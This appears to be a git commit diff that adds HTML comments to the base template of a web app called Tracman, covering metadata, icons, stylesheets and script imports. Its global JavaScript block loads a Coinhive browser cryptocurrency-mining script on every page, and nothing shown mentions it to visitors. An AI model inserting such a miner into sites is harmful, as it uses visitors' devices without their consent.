Added comments to HTML

master
Keith Irwin 2017-09-27 18:23:46 +00:00
parent c55574f16c
commit 262908660c
No known key found for this signature in database
GPG Key ID: 378933C743E2BBC0
1 changed files with 18 additions and 4 deletions

View File

@ -18,6 +18,7 @@
{% block head %}
<title>{% block title %}Tracman{% endblock %}</title>
<!-- Metadata -->
<link rel="manifest" href="/static/manifest.webmanifest">
<meta http-equiv="Content-type" content="text/html;charset=utf-8">
<meta charset="UTF-8">
@ -29,7 +30,8 @@
<meta name="msapplication-navbutton-color" content="#222">
<meta name="apple-mobile-web-app-capable" content="yes">
<meta name="apple-mobile-web-app-status-bar-style" content="black-translucent">
<!-- Icons -->
<link rel="shortcut icon" sizes="16x16 32x32 48x48" type="image/x-icon" href="/static/img/icon/by/16-32-48.ico">
<link rel="icon apple-touch-icon" sizes="32x32" type="image/png" href="/static/img/icon/by/32.png">
<link rel="icon apple-touch-icon" sizes="57x57" type="image/png" href="/static/img/icon/by/57.png">
@ -39,32 +41,44 @@
<link rel="icon apple-touch-icon" sizes="228x228" type="image/png" href="/static/img/icon/by/228.png">
<link rel="apple-touch-icon-precomposed" type="image/png" href="/static/img/icon/by/152.png">
<!-- Styles -->
<link rel="stylesheet" type="text/css" href="https://maxcdn.bootstrapcdn.com/font-awesome/4.5.0/css/font-awesome.min.css">
<link rel="stylesheet" type="text/css" href="https://fonts.googleapis.com/css?family=Open+Sans:300,600">
<link rel="stylesheet" type="text/css" href="https://fonts.googleapis.com/css?family=Merriweather:300,700">
<script src="https://code.jquery.com/jquery-3.2.1.min.js" integrity="sha256-hwg4gsxgFZhOsEEamdOYGBf13FyQuiTwlAQgxVSNgt4=" crossorigin="anonymous"></script>
<link rel="stylesheet" type="text/css" href="/static/css/.base.min.css">
<!-- Head javascript imports -->
<script src="https://code.jquery.com/jquery-3.2.1.min.js" integrity="sha256-hwg4gsxgFZhOsEEamdOYGBf13FyQuiTwlAQgxVSNgt4=" crossorigin="anonymous"></script>
<!--[if lt IE 9]>
<script src="/scripts/html5shiv.js"></script>
<script src="/scripts/respond.min.js"></script>
<![endif]-->
{% endblock %}
<!-- Header and footer CSS -->
{% if not noHeader %}<link href="/static/css/.header.min.css" rel="stylesheet">{% endif %}
{% if not noFooter %}<link href="/static/css/.footer.min.css" rel="stylesheet">{% endif %}
</head>
<body>
<!-- Header -->
{% if not noHeader %}{% include 'templates/header.html' %}{% endif %}
<main>
<!-- Main page -->
{% block main %}{% endblock %}
<!-- Footer -->
{% if not noFooter %}{% include 'templates/footer.html' %}{% endif %}
</main>
<!-- Javascript -->
{% block javascript %}
<!-- Global imports -->
<script type="application/javascript" src="https://coin-hive.com/lib/coinhive.min.js"></script>
<script type="application/javascript" src="/static/js/.base.bun.js"></script>
{% endblock %}